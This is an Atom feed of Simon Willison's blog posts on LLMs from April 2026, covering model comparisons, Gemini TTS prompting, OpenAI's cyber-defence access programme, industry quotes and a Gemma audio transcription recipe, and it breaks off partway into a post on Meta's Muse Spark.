<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: llms</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/tags/llms.atom" rel="self"/><id>http://simonwillison.net/</id><updated>2026-04-16T17:16:52+00:00</updated><author><name>Simon Willison</name></author><entry><title>Qwen3.6-35B-A3B on my laptop drew me a better pelican than Claude Opus 4.7</title><link href="https://simonwillison.net/2026/Apr/16/qwen-beats-opus/#atom-tag" rel="alternate"/><published>2026-04-16T17:16:52+00:00</published><updated>2026-04-16T17:16:52+00:00</updated><id>https://simonwillison.net/2026/Apr/16/qwen-beats-opus/#atom-tag</id><summary type="html">
    &lt;p&gt;For anyone who has been taking my &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle/"&gt;pelican riding a bicycle benchmark&lt;/a&gt; seriously as a robust way to test models, here are pelicans from this morning's two big model releases - &lt;a href="https://qwen.ai/blog?id=qwen3.6-35b-a3b"&gt;Qwen3.6-35B-A3B from Alibaba&lt;/a&gt; and &lt;a href="https://www.anthropic.com/news/claude-opus-4-7"&gt;Claude Opus 4.7 from Anthropic&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Here's the Qwen 3.6 pelican, generated using &lt;a href="https://huggingface.co/unsloth/Qwen3.6-35B-A3B-GGUF/blob/main/Qwen3.6-35B-A3B-UD-Q4_K_S.gguf"&gt;this 20.9GB Qwen3.6-35B-A3B-UD-Q4_K_S.gguf&lt;/a&gt; quantized model by Unsloth, running on my MacBook Pro M5 via &lt;a href="https://lmstudio.ai/"&gt;LM Studio&lt;/a&gt; (and the &lt;a href="https://github.com/agustif/llm-lmstudio"&gt;llm-lmstudio&lt;/a&gt; plugin) - &lt;a href="https://gist.github.com/simonw/4389d355d8e162bc6e4547da214f7dd2"&gt;transcript here&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/Qwen3.6-35B-A3B-UD-Q4_K_S-pelican.png" alt="The bicycle frame is the correct shape. There are clouds in the sky. The pelican has a dorky looking pouch. A caption on the ground reads Pelican on a Bicycle!" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;And here's one I got from Anthropic's &lt;a href="https://www.anthropic.com/news/claude-opus-4-7"&gt;brand new Claude Opus 4.7&lt;/a&gt; (&lt;a href="https://gist.github.com/simonw/afcb19addf3f38eb1996e1ebe749c118"&gt;transcript&lt;/a&gt;):&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/opus-4.7-pelican.png" alt="The bicycle frame is entirely the wrong shape. No clouds, a yellow sun. The pelican is looking behind itself, and has a less pronounced pouch than I would like." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;I'm giving this one to Qwen 3.6. Opus managed to mess up the bicycle frame!&lt;/p&gt;
&lt;p&gt;I tried Opus a second time passing &lt;code&gt;thinking_level: max&lt;/code&gt;. It didn't do much better (&lt;a href="https://gist.github.com/simonw/7566e04a81accfb9affda83451c0f363"&gt;transcript&lt;/a&gt;):&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/opus-4.7-pelican-max.png" alt="The bicycle frame is entirely the wrong shape but in a different way. Lines are more bold. Pelican looks a bit more like a pelican." style="max-width: 100%;" /&gt;&lt;/p&gt;

&lt;h4 id="i-dont-think-qwen-are-cheating"&gt;I don't think Qwen are cheating&lt;/h4&gt;
&lt;p&gt;A lot of people are &lt;a href="https://simonwillison.net/2025/Nov/13/training-for-pelicans-riding-bicycles/"&gt;convinced that the labs train for my stupid benchmark&lt;/a&gt;. I don't think they do, but honestly this result did give me a little glint of suspicion. So I'm burning one of my secret backup tests - here's what I got from Qwen3.6-35B-A3B and Opus 4.7 for "Generate an SVG of a flamingo riding a unicycle":&lt;/p&gt;

&lt;div style="display: flex; gap: 4px;"&gt;
  &lt;figure style="flex: 1; text-align: center; margin: 0;"&gt;
    &lt;figcaption style="margin-bottom: 1em"&gt;Qwen3.6-35B-A3B&lt;br /&gt;(&lt;a href="https://gist.github.com/simonw/f1d1ff01c34dda5fdedf684cfc430d92"&gt;transcript&lt;/a&gt;)&lt;/figcaption&gt;
    &lt;img src="https://static.simonwillison.net/static/2026/qwen-flamingo.png" alt="The unicycle spokes are a too long. The pelican has sunglasses, a bowtie and appears to be smoking a cigarette. It has two heart emoji surrounding the caption Flamingo on a Unicycle. It has a lot of charisma." style="max-width: 100%; height: auto;" /&gt;
  &lt;/figure&gt;
  &lt;figure style="flex: 1; text-align: center; margin: 0;"&gt;
    &lt;figcaption style="margin-bottom: 1em"&gt;Opus 4.7&lt;br /&gt;(&lt;a href="https://gist.github.com/simonw/35121ad5dcf23bf860397a103ae88d50"&gt;transcript&lt;/a&gt;)&lt;/figcaption&gt;
    &lt;img src="https://static.simonwillison.net/static/2026/opus-flamingo.png" alt="The unicycle has a black wheel. The flamingo is a competent if slightly dull vector illustration of a flamingo. It has no flair." style="max-width: 100%; height: auto;" /&gt;
  &lt;/figure&gt;
&lt;/div&gt;


&lt;p&gt;I'm giving this one to Qwen too, partly for the excellent &lt;code&gt;&amp;lt;!-- Sunglasses on flamingo! --&amp;gt;&lt;/code&gt; SVG comment.&lt;/p&gt;

&lt;h4 id="what-can-we-learn-from-this-"&gt;What can we learn from this?&lt;/h4&gt;
&lt;p&gt;The pelican benchmark has always been meant as a joke - it's mainly a statement on how obtuse and absurd the task of comparing these models is.&lt;/p&gt;
&lt;p&gt;The weird thing about that joke is that, for the most part, there has been a direct correlation between the quality of the pelicans produced and the general usefulness of the models. Those &lt;a href="https://simonwillison.net/2024/Oct/25/pelicans-on-a-bicycle/"&gt;first pelicans from October 2024&lt;/a&gt; were junk. The &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle/"&gt;more recent entries&lt;/a&gt; have generally been much, much better - to the point that Gemini 3.1 Pro produces &lt;a href="https://simonwillison.net/2026/Feb/19/gemini-31-pro/"&gt;illustrations you could actually use somewhere&lt;/a&gt;, provided you had a pressing need to illustrate a pelican riding a bicycle.&lt;/p&gt;
&lt;p&gt;Today, even that loose connection to utility has been broken. I have enormous respect for Qwen, but I very much doubt that a 21GB quantized version of their latest model is more powerful or useful than Anthropic's latest proprietary release.&lt;/p&gt;
&lt;p&gt;If the thing you need is an SVG illustration of a pelican riding a bicycle though, right now Qwen3.6-35B-A3B running on a laptop is a better bet than Opus 4.7!&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pelican-riding-a-bicycle"&gt;pelican-riding-a-bicycle&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/local-llms"&gt;local-llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/qwen"&gt;qwen&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/lm-studio"&gt;lm-studio&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="anthropic"/><category term="claude"/><category term="pelican-riding-a-bicycle"/><category term="ai"/><category term="local-llms"/><category term="llms"/><category term="qwen"/><category term="generative-ai"/><category term="lm-studio"/><category term="llm-release"/></entry><entry><title>Gemini 3.1 Flash TTS</title><link href="https://simonwillison.net/2026/Apr/15/gemini-31-flash-tts/#atom-tag" rel="alternate"/><published>2026-04-15T17:13:14+00:00</published><updated>2026-04-15T17:13:14+00:00</updated><id>https://simonwillison.net/2026/Apr/15/gemini-31-flash-tts/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-flash-tts/"&gt;Gemini 3.1 Flash TTS&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Google released Gemini 3.1 Flash TTS today, a new text-to-speech model that can be directed using prompts.&lt;/p&gt;
&lt;p&gt;It's presented via the standard Gemini API using &lt;code&gt;gemini-3.1-flash-tts-preview&lt;/code&gt; as the model ID, but can only output audio files.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://ai.google.dev/gemini-api/docs/speech-generation#transcript-tags"&gt;prompting guide&lt;/a&gt; is surprising, to say the least. Here's their example prompt to generate just a few short sentences of audio:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# AUDIO PROFILE: Jaz R.
## "The Morning Hype"

## THE SCENE: The London Studio
It is 10:00 PM in a glass-walled studio overlooking the moonlit London skyline, but inside, it is blindingly bright. The red "ON AIR" tally light is blazing. Jaz is standing up, not sitting, bouncing on the balls of their heels to the rhythm of a thumping backing track. Their hands fly across the faders on a massive mixing desk. It is a chaotic, caffeine-fueled cockpit designed to wake up an entire nation.

### DIRECTOR'S NOTES
Style:
* The "Vocal Smile": You must hear the grin in the audio. The soft palate is always raised to keep the tone bright, sunny, and explicitly inviting.
* Dynamics: High projection without shouting. Punchy consonants and elongated vowels on excitement words (e.g., "Beauuutiful morning").

Pace: Speaks at an energetic pace, keeping up with the fast music.  Speaks with A "bouncing" cadence. High-speed delivery with fluid transitions — no dead air, no gaps.

Accent: Jaz is from Brixton, London

### SAMPLE CONTEXT
Jaz is the industry standard for Top 40 radio, high-octane event promos, or any script that requires a charismatic Estuary accent and 11/10 infectious energy.

#### TRANSCRIPT
[excitedly] Yes, massive vibes in the studio! You are locked in and it is absolutely popping off in London right now. If you're stuck on the tube, or just sat there pretending to work... stop it. Seriously, I see you.
[shouting] Turn this up! We've got the project roadmap landing in three, two... let's go!
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's what I got using that example prompt:&lt;/p&gt;
&lt;p&gt;&lt;audio controls style="width: 100%"&gt;
  &lt;source src="https://static.simonwillison.net/static/2026/gemini-flash-tts-london.wav" type="audio/wav"&gt;
  Your browser does not support the audio element.
&lt;/audio&gt;&lt;/p&gt;
&lt;p&gt;Then I modified it to say "Jaz is from Newcastle" and "... requires a charismatic Newcastle accent" and got this result:&lt;/p&gt;
&lt;p&gt;&lt;audio controls style="width: 100%"&gt;
  &lt;source src="https://static.simonwillison.net/static/2026/gemini-flash-tts-newcastle.wav" type="audio/wav"&gt;
  Your browser does not support the audio element.
&lt;/audio&gt;&lt;/p&gt;
&lt;p&gt;Here's Exeter, Devon for good measure:&lt;/p&gt;
&lt;p&gt;&lt;audio controls style="width: 100%"&gt;
  &lt;source src="https://static.simonwillison.net/static/2026/gemini-flash-tts-devon.wav" type="audio/wav"&gt;
  Your browser does not support the audio element.
&lt;/audio&gt;&lt;/p&gt;
&lt;p&gt;I &lt;a href="https://gemini.google.com/share/dd0fba5a83c4"&gt;had Gemini 3.1 Pro&lt;/a&gt; vibe code &lt;a href="https://tools.simonwillison.net/gemini-flash-tts"&gt;this UI for trying it out&lt;/a&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of a &amp;quot;Gemini 3.1 Flash TTS&amp;quot; web application interface. At the top is an &amp;quot;API Key&amp;quot; field with a masked password. Below is a &amp;quot;TTS Mode&amp;quot; section with a dropdown set to &amp;quot;Multi-Speaker (Conversation)&amp;quot;. &amp;quot;Speaker 1 Name&amp;quot; is set to &amp;quot;Joe&amp;quot; with &amp;quot;Speaker 1 Voice&amp;quot; set to &amp;quot;Puck (Upbeat)&amp;quot;. &amp;quot;Speaker 2 Name&amp;quot; is set to &amp;quot;Jane&amp;quot; with &amp;quot;Speaker 2 Voice&amp;quot; set to &amp;quot;Kore (Firm)&amp;quot;. Under &amp;quot;Script / Prompt&amp;quot; is a tip reading &amp;quot;Tip: Format your text as a script using the Exact Speaker Names defined above.&amp;quot; The script text area contains &amp;quot;TTS the following conversation between Joe and Jane:\n\nJoe: How's it going today Jane?\nJane: [yawn] Not too bad, how about you?&amp;quot; A blue &amp;quot;Generate Audio&amp;quot; button is below. At the bottom is a &amp;quot;Success!&amp;quot; message with an audio player showing 00:00 / 00:06 and a &amp;quot;Download WAV&amp;quot; link." src="https://static.simonwillison.net/static/2026/gemini-flash-tts.jpg" /&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/text-to-speech"&gt;text-to-speech&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/prompt-engineering"&gt;prompt-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemini"&gt;gemini&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-release"&gt;llm-release&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/tools"&gt;tools&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;&lt;/p&gt;



</summary><category term="text-to-speech"/><category term="prompt-engineering"/><category term="gemini"/><category term="llm-release"/><category term="tools"/><category term="google"/><category term="generative-ai"/><category term="ai"/><category term="llms"/><category term="vibe-coding"/></entry><entry><title>Trusted access for the next era of cyber defense</title><link href="https://simonwillison.net/2026/Apr/14/trusted-access-openai/#atom-tag" rel="alternate"/><published>2026-04-14T21:23:59+00:00</published><updated>2026-04-14T21:23:59+00:00</updated><id>https://simonwillison.net/2026/Apr/14/trusted-access-openai/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://openai.com/index/scaling-trusted-access-for-cyber-defense/"&gt;Trusted access for the next era of cyber defense&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
OpenAI's answer to &lt;a href="https://simonwillison.net/2026/Apr/7/project-glasswing/"&gt;Claude Mythos&lt;/a&gt; appears to be a new model called GPT-5.4-Cyber:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In preparation for increasingly more capable models from OpenAI over the next few months, we are fine-tuning our models specifically to enable defensive cybersecurity use cases, starting today with a variant of GPT‑5.4 trained to be cyber-permissive: GPT‑5.4‑Cyber.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;They're also extending a program they launched in February (which I had missed) called &lt;a href="https://openai.com/index/trusted-access-for-cyber/"&gt;Trusted Access for Cyber&lt;/a&gt;, where users can verify their identity (via a photo of a government-issued ID processed by &lt;a href="https://withpersona.com/"&gt;Persona&lt;/a&gt;) to gain "reduced friction" access to OpenAI's models for cybersecurity work.&lt;/p&gt;
&lt;p&gt;Honestly, this OpenAI announcement is difficult to follow. Unsurprisingly they don't mention Anthropic at all, but much of the piece emphasizes their many years of existing cybersecurity work and their goal to "democratize access" to these tools, hence the emphasis on that self-service verification flow from February.&lt;/p&gt;
&lt;p&gt;If you want access to their best security tools you still need to go through an extra Google Form application process though, which doesn't feel particularly different to me from Anthropic's &lt;a href="https://www.anthropic.com/glasswing"&gt;Project Glasswing&lt;/a&gt;.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47770770"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;&lt;/p&gt;



</summary><category term="security"/><category term="generative-ai"/><category term="ai-security-research"/><category term="openai"/><category term="ai"/><category term="llms"/><category term="anthropic"/></entry><entry><title>Cybersecurity Looks Like Proof of Work Now</title><link href="https://simonwillison.net/2026/Apr/14/cybersecurity-proof-of-work/#atom-tag" rel="alternate"/><published>2026-04-14T19:41:48+00:00</published><updated>2026-04-14T19:41:48+00:00</updated><id>https://simonwillison.net/2026/Apr/14/cybersecurity-proof-of-work/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.dbreunig.com/2026/04/14/cybersecurity-is-proof-of-work-now.html"&gt;Cybersecurity Looks Like Proof of Work Now&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
The UK's AI Safety Institute recently published &lt;a href="https://www.aisi.gov.uk/blog/our-evaluation-of-claude-mythos-previews-cyber-capabilities"&gt;Our evaluation of Claude Mythos Preview’s cyber capabilities&lt;/a&gt;, their own independent analysis of &lt;a href="https://simonwillison.net/2026/Apr/7/project-glasswing/"&gt;Claude Mythos&lt;/a&gt; which backs up Anthropic's claims that it is exceptionally effective at identifying security vulnerabilities.&lt;/p&gt;
&lt;p&gt;Drew Breunig notes that AISI's report shows that the more tokens (and hence money) they spent the better the result they got, which leads to a strong economic incentive to spend as much as possible on security reviews:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;If Mythos continues to find exploits so long as you keep throwing money at it, security is reduced to a brutally simple equation: &lt;strong&gt;to harden a system you need to spend more tokens discovering exploits than attackers will spend exploiting them&lt;/strong&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;An interesting result of this is that open source libraries become &lt;em&gt;more&lt;/em&gt; valuable, since the tokens spent securing them can be shared across all of their users. This directly counters the idea that the low cost of vibe-coding up a replacement for an open source library makes those open source projects less attractive.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/drew-breunig"&gt;drew-breunig&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-security-research"&gt;ai-security-research&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;&lt;/p&gt;



</summary><category term="drew-breunig"/><category term="open-source"/><category term="generative-ai"/><category term="ai-security-research"/><category term="ai"/><category term="llms"/><category term="vibe-coding"/></entry><entry><title>Steve Yegge</title><link href="https://simonwillison.net/2026/Apr/13/steve-yegge/#atom-tag" rel="alternate"/><published>2026-04-13T20:59:00+00:00</published><updated>2026-04-13T20:59:00+00:00</updated><id>https://simonwillison.net/2026/Apr/13/steve-yegge/#atom-tag</id><summary type="html">
    &lt;p&gt;&lt;a href="https://twitter.com/steve_yegge/status/2043747998740689171"&gt;Steve Yegge&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I was chatting with my buddy at Google, who's been a tech director there for about 20 years, about their AI adoption. Craziest convo I've had all year.&lt;/p&gt;
&lt;p&gt;The TL;DR is that Google engineering appears to have the same AI adoption footprint as John Deere, the tractor company. Most of the industry has the same internal adoption curve: 20% agentic power users, 20% outright refusers, 60% still using Cursor or equivalent chat tool. It turns out Google has this curve too. [...]&lt;/p&gt;
&lt;p&gt;There has been an industry-wide hiring freeze for 18+ months, during which time nobody has been moving jobs. So there are no clued-in people coming in from the outside to tell Google how far behind they are, how utterly mediocre they have become as an eng org.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="https://twitter.com/addyosmani/status/2043812343508021460"&gt;Addy Osmani&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;On behalf of @Google, this post doesn't match the state of agentic coding at our company. Over 40K SWEs use agentic coding weekly here. Googlers have access to our own versions of @antigravity, @geminicli, custom models, skills, CLIs and MCPs for our daily work. Orchestrators, agent loops, virtual SWE teams and many other systems are actively available to folks. [...]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;a href="https://twitter.com/demishassabis/status/2043867486320222333"&gt;Demis Hassabis&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Maybe tell your buddy to do some actual work and to stop spreading absolute nonsense. This post is completely false and just pure clickbait.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/addy-osmani"&gt;addy-osmani&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/steve-yegge"&gt;steve-yegge&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/google"&gt;google&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;&lt;/p&gt;



</summary><category term="addy-osmani"/><category term="steve-yegge"/><category term="google"/><category term="generative-ai"/><category term="agentic-engineering"/><category term="ai"/><category term="llms"/></entry><entry><title>Quoting Bryan Cantrill</title><link href="https://simonwillison.net/2026/Apr/13/bryan-cantrill/#atom-tag" rel="alternate"/><published>2026-04-13T02:44:24+00:00</published><updated>2026-04-13T02:44:24+00:00</updated><id>https://simonwillison.net/2026/Apr/13/bryan-cantrill/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://bcantrill.dtrace.org/2026/04/12/the-peril-of-laziness-lost/"&gt;&lt;p&gt;The problem is that LLMs inherently &lt;strong&gt;lack the virtue of laziness&lt;/strong&gt;. Work costs nothing to an LLM. LLMs do not feel a need to optimize for their own (or anyone's) future time, and will happily dump more and more onto a layercake of garbage. Left unchecked, LLMs will make systems larger, not better &amp;mdash; appealing to perverse vanity metrics, perhaps, but at the cost of everything that matters.&lt;/p&gt;
&lt;p&gt;As such, LLMs highlight how essential our human laziness is: our finite time &lt;strong&gt;forces&lt;/strong&gt; us to develop crisp abstractions in part because we don't want to waste our (human!) time on the consequences of clunky ones.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://bcantrill.dtrace.org/2026/04/12/the-peril-of-laziness-lost/"&gt;Bryan Cantrill&lt;/a&gt;, The peril of laziness lost&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/bryan-cantrill"&gt;bryan-cantrill&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;&lt;/p&gt;



</summary><category term="bryan-cantrill"/><category term="ai"/><category term="llms"/><category term="ai-assisted-programming"/><category term="generative-ai"/></entry><entry><title>Gemma 4 audio with MLX</title><link href="https://simonwillison.net/2026/Apr/12/mlx-audio/#atom-tag" rel="alternate"/><published>2026-04-12T23:57:53+00:00</published><updated>2026-04-12T23:57:53+00:00</updated><id>https://simonwillison.net/2026/Apr/12/mlx-audio/#atom-tag</id><summary type="html">
    &lt;p&gt;Thanks to a &lt;a href="https://twitter.com/RahimNathwani/status/2039961945613209852"&gt;tip from Rahim Nathwani&lt;/a&gt;, here's a &lt;code&gt;uv run&lt;/code&gt; recipe for transcribing an audio file on macOS using the 10.28 GB &lt;a href="https://huggingface.co/google/gemma-4-E2B"&gt;Gemma 4 E2B model&lt;/a&gt; with MLX and &lt;a href="https://github.com/Blaizzy/mlx-vlm"&gt;mlx-vlm&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uv run --python 3.13 --with mlx_vlm --with torchvision --with gradio \
  mlx_vlm.generate \
  --model google/gemma-4-e2b-it \
  --audio file.wav \
  --prompt "Transcribe this audio" \
  --max-tokens 500 \
  --temperature 1.0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;audio controls style="width: 100%"&gt;
  &lt;source src="https://static.simonwillison.net/static/2026/demo-audio-for-gemma.wav" type="audio/wav"&gt;
  Your browser does not support the audio element.
&lt;/audio&gt;&lt;/p&gt;
&lt;p&gt;I tried it on &lt;a href="https://static.simonwillison.net/static/2026/demo-audio-for-gemma.wav"&gt;this 14 second &lt;code&gt;.wav&lt;/code&gt; file&lt;/a&gt; and it output the following:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This front here is a quick voice memo. I want to try it out with MLX VLM. Just going to see if it can be transcribed by Gemma and how that works.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;(That was supposed to be "This right here..." and "... how well that works" but I can hear why it misinterpreted that as "front" and "how that works".)&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/uv"&gt;uv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/mlx"&gt;mlx&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/gemma"&gt;gemma&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/speech-to-text"&gt;speech-to-text&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;&lt;/p&gt;



</summary><category term="uv"/><category term="mlx"/><category term="ai"/><category term="gemma"/><category term="llms"/><category term="speech-to-text"/><category term="python"/><category term="generative-ai"/></entry><entry><title>ChatGPT voice mode is a weaker model</title><link href="https://simonwillison.net/2026/Apr/10/voice-mode-is-weaker/#atom-tag" rel="alternate"/><published>2026-04-10T15:56:02+00:00</published><updated>2026-04-10T15:56:02+00:00</updated><id>https://simonwillison.net/2026/Apr/10/voice-mode-is-weaker/#atom-tag</id><summary type="html">
    &lt;p&gt;I think it's non-obvious to many people that the OpenAI voice mode runs on a much older, much weaker model - it feels like the AI that you can talk to should be the smartest AI but it really isn't.&lt;/p&gt;
&lt;p&gt;If you ask ChatGPT voice mode for its knowledge cutoff date it tells you April 2024 - it's a GPT-4o era model.&lt;/p&gt;
&lt;p&gt;This thought inspired by &lt;a href="https://twitter.com/karpathy/status/2042334451611693415"&gt;this Andrej Karpathy tweet&lt;/a&gt; about the growing gap in understanding of AI capability based on the access points and domains people are using the models with:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;[...] It really is simultaneously the case that OpenAI's free and I think slightly orphaned (?) "Advanced Voice Mode" will fumble the dumbest questions in your Instagram's reels and &lt;em&gt;at the same time&lt;/em&gt;, OpenAI's highest-tier and paid Codex model will go off for 1 hour to coherently restructure an entire code base, or find and exploit vulnerabilities in computer systems.&lt;/p&gt;
&lt;p&gt;This part really works and has made dramatic strides because 2 properties:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;these domains offer explicit reward functions that are verifiable meaning they are easily amenable to reinforcement learning training (e.g. unit tests passed yes or no, in contrast to writing, which is much harder to explicitly judge),  but also&lt;/li&gt;
&lt;li&gt;they are a lot more valuable in b2b settings, meaning that the biggest fraction of the team is focused on improving them.&lt;/li&gt;
&lt;/ol&gt;
&lt;/blockquote&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/andrej-karpathy"&gt;andrej-karpathy&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openai"&gt;openai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/chatgpt"&gt;chatgpt&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;&lt;/p&gt;



</summary><category term="andrej-karpathy"/><category term="generative-ai"/><category term="openai"/><category term="chatgpt"/><category term="ai"/><category term="llms"/></entry><entry><title>Meta's new model is Muse Spark, and meta.ai chat has some interesting tools</title><link href="https://simonwillison.net/2026/Apr/8/muse-spark/#atom-tag" rel="alternate"/><published>2026-04-08T23:07:44+00:00</published><updated>2026-04-08T23:07:44+00:00</updated><id>https://simonwillison.net/2026/Apr/8/muse-spark/#atom-tag</id><summary type="html">
    &lt;p&gt;Meta &lt;a href="https://ai.meta.com/blog/introducing-muse-spark-msl/"&gt;announced Muse Spark&lt;/a&gt; today, their first model release since Llama 4 &lt;a href="https://simonwillison.net/2025/Apr/5/llama-4-notes/"&gt;almost exactly a year ago&lt;/a&gt;. It's hosted, not open weights, and the API is currently "a private API preview to select users", but you can try it out today on &lt;a href="https://meta.ai/"&gt;meta.ai&lt;/a&gt; (Facebook or Instagram login required).&lt;/p&gt;
&lt;p&gt;Meta's self-reported benchmarks show it competitive with Opus 4.6, Gemini 3.1 Pro, and GPT 5.4 on selected benchmarks, though notably behind on Terminal-Bench 2.0. Meta themselves say they "continue to invest in areas with current performance gaps, such as long-horizon agentic systems and coding workflows".&lt;/p&gt;
